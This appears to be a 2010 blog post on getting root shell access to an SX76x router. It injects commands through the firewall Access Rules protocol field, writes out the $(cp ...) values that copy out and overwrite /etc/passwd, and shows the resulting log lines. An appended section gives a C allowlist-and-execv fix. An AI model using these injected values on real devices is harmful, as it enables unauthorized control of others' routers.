Tuesday, April 27, 2010, 15:55
I want my shell (still SX76x)
UPDATE1: The info below is dated; it is easier to use the PHP script I made and attached to the post.
UPDATE2: Updated the script so it can now be used to change the administrator user to root; that way those with a pubkey-locked administrator account can log in via ssh too.
Well, enabling ssh on the SX76x is one thing, but one might prefer shell access instead of the stupid management console listening on the other end, like:
```
sx762 login: administrator
Password:
Trying to connect to SCM ... ... Connected to SCM
Response: OK
IGD.>
```
So what can we do? Let's find another bug :)
First we share a USB stick with FTP access as we would normally do:

Of course this needs a pendrive plugged in; something like this happens:
```
00.00.0000 00:08:47 War <EVENT> kernel: Got MODEM_READY_MSG
00.00.0000 00:09:14 War <EVENT> kernel: Vendor: Kingston Model: DataTraveler2.0 Rev: 1.00
00.00.0000 00:09:14 War <EVENT> kernel: Type: Direct-Access ANSI SCSI revision: 02
00.00.0000 00:09:14 War <EVENT> kernel: Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0
00.00.0000 00:09:14 War <EVENT> kernel: SCSI device sda: 1956735 512-byte hdwr sectors (1002 MB)
00.00.0000 00:09:14 War <EVENT> kernel: sda: Write Protect is off
00.00.0000 00:09:14 War <EVENT> kernel: /dev/scsi/host0/bus0/target0/lun0:kernel: p1
00.00.0000 00:09:14 Err <EVENT> scm: 073-00-00 CM_USB_MOUNT: -> MOUNTING: >mount /dev/scsi/host0/bus0/target0/lun0/part1 /mnt/usbmsd/share/usb_1 vfat<
```
Let's test it:

Now that we see our pendrive via FTP, let's add some Access Rules, with Tamper Data of course:

Let's write a command like $(cp /etc/passwd /mnt/usbmsd/share/usb_1) into the comment box (this just helps us URL-encode it for Tamper Data) and add that port with the Tamper Data addon active. Then let's copy the name parameter that holds the command over to the protocol parameter, as it looks much nicer there.

And send it away; it is going to result in something like this:

And a lonely error message in the logs tells us that what we wanted failed:
```
00.00.0000 00:34:13 Err <EVENT> scm: 077-00-00 cmd[/bin/iptables -A Access -p $(cp /etc/passwd /mnt/usbmsd/share/usb_1) -j ACCEPT] failed with err[512]
```
Let's delete the Access rule we just made, as it fails, and take a look at the pendrive via FTP:

Oh, a new file called passwd. Let's edit it a bit, as /bin/mgmt is not a shell but /bin/sh is:
And save the changes to our pendrive and try to create another access rule that might not fail this time, like $(cp /mnt/usbmsd/share/usb_1/passwd /etc)

Click add and tamper it like last time:

Sadly, the result in the logs will be something similar:
```
00.00.0000 00:57:53 Err <EVENT> scm: 077-00-00 cmd[/bin/iptables -A Access -p $(cp /mnt/usbmsd/share/usb_1/passwd /etc) -j ACCEPT] failed with err[512]
```
So let's just delete that rule too, and try to log in via ssh:
```
sx762 login: administrator
Password:
BusyBox v1.00 (2009.02.26-10:13+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ #
```
Something did the magic; at least now we have a shell (until the next restart, unless you make a user script to overwrite the passwd file on each boot).
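
How the rule handler could close this hole, as an added example that is not from the post or the device firmware: the scm log lines above show the protocol field landing inside the iptables command line with its $(...) intact, which suggests the string is handed to a shell (an assumption, since the scm source is not shown). This C sketch checks the field against an allowlist and builds an argv for execv instead; the allowlist contents and all function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed set of protocols the rule form offers (hypothetical allowlist). */
static const char *const ALLOWED_PROTO[] = { "tcp", "udp", "icmp", "all" };

/* Exact match only: no prefix or substring matching. */
int proto_is_allowed(const char *proto)
{
    for (size_t i = 0; proto && i < sizeof ALLOWED_PROTO / sizeof *ALLOWED_PROTO; i++)
        if (strcmp(proto, ALLOWED_PROTO[i]) == 0)
            return 1;
    return 0;
}

/* One argv element per argument, so no shell parses proto; -1 = rejected. */
int build_access_rule(const char *proto, const char *argv[8])
{
    if (!proto_is_allowed(proto))
        return -1;
    const char *v[8] = { "/bin/iptables", "-A", "Access", "-p", proto, "-j", "ACCEPT", NULL };
    memcpy(argv, v, sizeof v);
    return 7;
}

/* Validate first, then fork and execv instead of handing a string to a shell. */
int run_access_rule(const char *proto)
{
    const char *argv[8];
    int status;
    if (build_access_rule(proto, argv) < 0)
        return -1;                      /* rejected before any process starts */
    pid_t pid = fork();
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);                     /* exec itself failed */
    }
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *a[8];   /* second input is the value seen in the router log */
    printf("%d %d\n", build_access_rule("tcp", a),
           build_access_rule("$(cp /etc/passwd /mnt/usbmsd/share/usb_1)", a));
    return 0;
}
```

The check has to run in the daemon that builds the rule, because the post's whole method is editing the request after the browser form has done its work.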

